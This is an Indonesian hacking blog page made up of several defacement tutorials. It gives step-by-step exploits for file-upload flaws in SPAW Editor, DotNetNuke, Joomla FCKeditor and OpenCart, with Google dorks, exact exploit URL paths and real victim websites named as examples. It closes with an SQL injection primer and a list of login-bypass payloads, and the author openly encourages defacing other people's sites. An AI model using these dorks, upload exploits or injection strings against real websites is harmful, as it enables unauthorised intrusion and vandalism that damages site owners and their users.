Twitter Delicious Facebook Digg Stumbleupon Favorites More
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

hahahaha........... asyik gk tu kalo kita Deface web dapet dollar????? kayaknya asyik dech...

ni perhatikan baik baik buat para defacer jangan marah ha.., menurut loe ada gk untungnya loe deface² selama ini...???? gk da kan... apa yang loe hasilkan hanya ngerusak website orang lain... mending kalo kita pelajarin dan dapet ilmu dari kerjaan yang kita lakukan itu, klo gk... kita ngerusak dan ngerusak terus menerus dengan membuat tampilan deface'an kita seindah / semenarik mungkin dengan membubuhi tulisan "hacked by ..." atau apalah itu.

hei bro buka mata & pikiran kalian, mending kalian hasilkan uang dari hobby loe tu... ini buka carding y, klo carding mah ane gak ngerti maklum newbie sejati....
lagian carding sekarang susah bisa² kalian pasan barang yang ngantarnya Interpol/FBI hiii takut, ane masih kuliah belum sarjana....ntar apa kata ortu gue.

ini mo ngomongin Deface web dapet dollar apa mo ngomongin carding......???? oia jadi lupa....

lanjut omz... ni ane baru kepikiran semalam gimana klo ane ambil sedikit keuntungan dari kesenangan gue deface daripada ane deface/ngerusak website orang gk da untungnya... kayaknya belum saatnya dech ane share tuturnya sekarang kayanya nunggu respond dulu dari orang² yang baca ini, lagi pula ane mo buat dulu tutorialnya.......

berikan respond anda dikolom komentar, apakah tutorial ini ane share atau gk?????

wew....sorry ni bro klo nungguin. ane tadi cuma becanda. apalah saya saya hanya seorang Newbie Sejati.....

Ni saya bagi sedikit hadiah....... karna telah mau berkunjung ke blog saya yang jelek ini........
jangan marah ha................ download aja langsung filenya nya


Sekali lagi Sorry.......

Ok kembali lagi bersama 70H4N 7M di Newbie Sejati, untuk membahas tutorial Spaw Upload Vulnerably / Spaw Editor Remote File Upload / Spaw File Manager. 


tanpa basa-basi lagi langsung kita tancap gas, gak usah pake rem lagi......

Tutorial Spaw Upload Vulnerably

dork [ spaw2/dialogs/ ] dan 
     [ spaw2/uploads/files/ ]

pertama-tama langsung kita cari target dengan memasukkan salah satu dork diatas di mesin pencari (google)

klo udah dapat target misalkan http://www.simoncarves.com/admin/spaw2/uploads/files/SC.pdf 

ganti spaw2/uploads/files/SC.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files maka akan muncul tampilan halaman/ form buat upload File.
ganti lokasi penyimpanan / directory jadi files seperti gambar dibawah ini.


kalo sudah Upload Dech File kamu.........

Apabila Proses ulpoad udah selesai maka akan terlihat file kamu. untuk mengetahui lokasi file kamu klik file yang baru kamu uploadtrus lihat disebelah kanan. ada link download file. seperti gambar berikut






klik link tersebut. maka akan terlihat file hasil deface'an kamu. contoh http://www.simoncarves.com/admin/spaw2/uploads/files/ns.txt

selesai dech tuturial Spaw Upload Vulnerably........
sampai ketemu di postingan berikutnya......
<<<Semiga bermanfaat>>>

Deface ala DotNetNuke. Sebelum kita mulai tutorial Deface ala DotNetNuke ini, mungkin di antara anda ada yang ber-tanya²  apa itu DotNetNuke...??? bagi yang belum tahu silahkan baca Disini. udah taukan??? nah klo udah tau mari kita langsung operasi.

sebenarnya bugs ini termasuk bugs lama, tapi masih banyak yang guna'in web aplikasi ini.............
postingan ini buka yang pertama kali ane post. pertama kali ane post di Forum MEH kemudian digroup Facebook Blackbox Guardian Yang berganti Nama Jadi Red Alpha. Terus Di forum BCC nah yang ane disini kali keempat-nya. itung-itung  buat nambah² archive Blog..hehehehehe

langsung saja

1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt
lalu save di notepad dengan nama file terserah anda contoh 70h4n-7m.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt << Target sekarang ganti "portals/0/70h4n-7m.txt" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

hingga seperti ini >> http://www.familyabusecenter.org/Pro...nkgallery.aspx
Enter..!!

lalu klik/ceklist Link Type: >> File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL...!!
http://www.familyabusecenter.org/Pro...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh 70H4N-7M.txt
klik >> Upload Selected File

Catatan: Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
tetapi admin dapat mengubah ini

selesai upload nanti kelihatan di File Name contoh: 70H4N-7M.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file

contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt

Selesai dech........
dari tutor diatas silahkan di explore kemampuan anda

Selamat mencoba



<<<Semoga Bermanfaat>>>

Joomla mambots File Upload Vulnerability, hehehehe..... sorry y kalo judulnya agak aneh soalnya ane buat sendiri tu judul, habisnya gk tau apa nama teknik/ tutorial yang bakal ane jelasin ini.

Gk pake basa-basi lagi malas ane ngetik-nya lagi. lansung kita ke topik pembahasan....

  1. cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
  2. kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
    ype=File&Connector=connectors/php/connector.php
    maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
  3. apabila selesai mengupload file maka file kita akan muncul di form/halam itu....
  4. untuk melihat dimana lokasi file kita dilettakan. blok dan klik kanan file yang barusan kita upload kemudian pilih View Selection Source, akan muncul seperti berikut
Joomla mambots File Upload Vulnerability

    Kurang lebih seperti itu tampilannya. kita lihat filenya ada di directory /File/ jadi letaknya ada di http://www.thomaskoetzing.de/File/70h4n.txt

Selesai dech tutorial Deface dengan Joomla mambots File Upload Vulnerability


<<< Semoga Bermanfaat>>>

Deface ala Opencart atau Opencart remote file Upload Vulnerability merupakan salah satu cara buat deface sebuah web yang support opencart, sebenarnya bugs ini termasuk bugs lama, namun berhubung banyaknya pertanyaan-pertanyaan yang masuk ke-saya melalui jejaring sosial sebut saja facebook. "Omz johan gimana sich deface menggunakan opencart...???" kurang lebih seperti itu pertanyaan yang masuk kesaya. ada juga yang lansung ngomong melalui chatroom "Om johan omz ajarin aku opencart donk" padahal duluan dia dibanding saya kenal dunia deface Sebut saja "DYAZ M.R" Sorry y omz Dyaz namanya ane masukin dipostingan ni...hehehehe.

Berhubung saya gk bisa merangkai kata² lg mending kita langsung aja y.................
Pertama-tama masukkan dork "Powered By OpenCart" di google anda bisa menambah Nama domain negara tujuan misalnya "Powered By OpenCart" site:il untuk negara Israel.
misalkan kita dapatkan http://emanuel-tehila.co.il/index.php?route=product/category&path=66_30_35. nah sepertinya OpenCart-nya ada di halaman awal. hapus index.php?route=product/category&path=66_30_35 ganti dengan admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

maka akan muncul halan untuk mengupload File kurang lebih seperti gambar dibawah ini tampilannya.

Deface ala OpenCart/Opencart remote file Upload Vulnerability


Disini kita gk bisa lansung upload File deface kita, kita musti ubah dulu connectornya jadi PHP dulu.

Deface ala OpenCart/Opencart remote file Upload Vulnerability



Sampai disini baru dah kita upluad file Deface-an kia contoh "703.html", apabila muncul pesan "File uploaded with no errors" berarti kita sukses mengupload file tadi. untuk hasilnya bisa ada di www.nama site.com/nama file.html contohnya http://emanuel-tehila.co.il/703.html

Selesai dech proses deface ala OpenCart. mohon koreksinya jika ada kekeliruan,


<<<Semoga Bermanfaat>>>

              Konsep dasar SQL Injection | wah ini postingan pertama ane ni tentang hacking. bagi para mastah mohon koreksi ntambahanya.

            SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

           SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman (scripting) pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu “suntikan”. Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

           Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman (scripting) pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

          Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya. 

           Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery=”SELECT Username FROM Users WHERE Username=”’&strUsername&”’strpassword&”’

           Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.


Contoh : menggunakan injection string ’OR’’= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=’’OR’’=’’ AND Password=’’OR’’=’’

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(”a”=”a
admin’–
hi” or 1=1 –
hi’ or’a’=’a
hi”)or(”a”=”a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
“or 1=1–
“or “a”=”a
’)or(’a’=’a
’)or(’x’=’x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–
            Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang.

             Sql Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat bertanya sama mbah google


<<<Semoga Bermanfaat>>>

Newbie Sejati ©2010 All rights reserved.
Design Template By Johan Jm
Powered by Blogger